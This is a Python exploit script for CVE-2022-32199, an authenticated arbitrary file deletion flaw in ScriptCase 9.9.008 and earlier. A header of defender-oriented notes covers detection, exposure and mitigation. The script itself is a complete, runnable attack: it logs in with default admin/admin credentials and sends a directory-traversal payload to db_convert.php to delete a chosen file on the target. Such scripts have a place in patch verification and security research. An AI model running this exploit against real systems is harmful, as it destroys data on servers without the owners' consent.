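#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Exploit Title: ScriptCase <= 9.9.008 - Arbitrary File Deletion
#
# Exploit Author: Toxi4
# CVE: CVE-2022-32199
# Date: 2023/03/26
# Vulnerability discovered by Anton Kartunov
# Vendor Homepage: https://www.scriptcase.net
# Software Link: https://downloads.scriptcase.net/v9/packs/scriptcase_install_en_us_v9.9.008-php8.1.exe
# Version: <= 9.9.008
# Tested on: Windows7x64 - ScriptCase 9.9.008 - Arbitrary File Deletion
#
# ScriptCase <= 9.9.008 is vulnerable to
# Arbitrary File Deletion by an admin
# via a directory traversal sequence in the file parameter
#
# Usage example: python3 CVE-2022-32199.py -t 127.0.0.1 -u admin -p admin -path windows/win.ini
#
# Reviewer notes (defender's view):
#   * Affected request: an authenticated POST to
#     <basepath>/devel/iface/db_convert.php with nm_option=delete_upload_file,
#     where the "file" value is not confined to the upload directory.
#   * Detection: look for POSTs to db_convert.php whose body carries
#     nm_option=delete_upload_file together with "../" in "file". Request
#     bodies are normally absent from access logs, so this needs body logging
#     or a WAF/reverse-proxy rule in front of the development interface.
#   * Exposure: the action requires a logged-in development-interface user.
#     This script defaults to admin/admin, so confirm that no default or weak
#     credentials remain on the instance.
#   * Mitigation: move to a release later than 9.9.008 (confirm the fixed
#     version with the vendor) and restrict network access to the /devel/
#     interface and its port.
#   * This script never inspects response bodies, so its output says only
#     that requests were sent, not that the login or the deletion succeeded.

import requests
import argparse
import sys
import re

# Named DESCRIPTION rather than "help" so the builtin help() is not shadowed.
DESCRIPTION = "ScriptCase <= 9.9.008 - Arbitrary File Deletion"

parser = argparse.ArgumentParser(description=DESCRIPTION)
parser.add_argument("-t", "--target", help="Target IP", required=True)
parser.add_argument("-u", "--username", help="Username", default="admin")
parser.add_argument("-p", "--password", help="Password", default="admin")
parser.add_argument("-path", help="File to delete")

args = parser.parse_args()

host = args.target
username = args.username
password = args.password
path = args.path
basepath = "/scriptcase"
port = 8092  # Default Port

# Upper bound (seconds) for each HTTP call so an unreachable host cannot hang
# the script indefinitely.
TIMEOUT = 15

s = requests.Session()

headers = {'Content-Type': 'application/x-www-form-urlencoded'}

# Raw string: the original non-raw literal relied on "\w"/"\W" being passed
# through, which newer Python versions warn about as an invalid escape.
TOKEN_RE = re.compile(r'name="form_login" value="([\w\W]*?)"')


def get_auth_token():
    """Fetch the login page and return the value of its form_login field.

    Exits with status 1 when the page cannot be retrieved or the field is not
    present in the response.
    """
    url = "http://{}:{}{}/devel/iface/login.php".format(host, port, basepath)
    try:
        response = s.get(url, timeout=TIMEOUT)
    except requests.RequestException:
        print("[-] Can't find token")
        sys.exit(1)

    # Search the decoded text rather than the repr() of the raw bytes.
    match = TOKEN_RE.search(response.text)
    if match is None:
        print("[-] Can't find token")
        sys.exit(1)
    return match.group(1)


def auth(token):
    """Send the two login POSTs using the session and the given form token.

    Returns 1 once both requests have been sent. The response bodies are not
    examined, so a return value of 1 does not prove the credentials were
    accepted. Exits with status 2 on a transport error.
    """
    url = "http://{}:{}{}/devel/iface/login.php".format(host, port, basepath)
    # Fixed "rand" value carried over from the original script; its meaning
    # is not shown on this page.
    url2 = "http://{}:{}{}/devel/iface/login.php?rand=a35a0d78d62a011e".format(host, port, basepath)
    data = "ajax=nm&option=login&field_user={USR}&field_pass={PASS}&form_login={TOKEN}&language=ru_ru&keep_logged=false".format(USR = username, PASS = password, TOKEN = token)
    data2 = "field_user={USR}&field_pass={PASS}&form_login={TOKEN}&change_lang=ru_ru".format(USR = username, PASS = password, TOKEN = token)
    try:
        first = s.post(url, data=data, headers=headers, timeout=TIMEOUT)
        second = s.post(url2, data=data2, headers=headers, timeout=TIMEOUT)
    except requests.RequestException:
        print("[-] Can't authorize")
        sys.exit(2)

    # The original printed "Authorization successful" unconditionally; report
    # only what is actually known at this point.
    print("[*] Login requests sent (HTTP {} / {}); login result not verified".format(
        first.status_code, second.status_code))
    return 1


def AFD():
    """Send the delete_upload_file request for the path given on the CLI.

    The response body is not examined, so the printed line reports only that
    the request was sent and the HTTP status that came back.
    """
    url = "http://{}:{}{}/devel/iface/db_convert.php".format(host, port, basepath)
    data = "nm_ajax=1&nm_option=delete_upload_file&file=../../../../../../../../../../{PATH}".format(PATH = path)
    try:
        response = s.post(url, headers=headers, data=data, timeout=TIMEOUT)
    except requests.RequestException:
        print("[-] Can't delete selected file")
        return

    # The original claimed "successfuly deleted" whenever no exception was
    # raised, which is a false positive for patch verification.
    print("[*] Delete request for {} sent (HTTP {}); deletion not verified".format(
        path, response.status_code))


def main():
    """Run the token fetch, the login and the delete request in order."""
    # Without this guard a missing -path was formatted as the literal "None".
    if not path:
        parser.error("-path is required")

    token = get_auth_token()
    if auth(token):
        AFD()
    else:
        print("[-] Can't authorize")


if __name__ == "__main__":
    # The original bare "except: sys.exit()" also caught SystemExit, which
    # turned the exit codes 1 and 2 set above into 0 and hid every other
    # error. Only Ctrl-C is handled here; everything else propagates.
    try:
        main()
    except KeyboardInterrupt:
        print('Interrupted by users...')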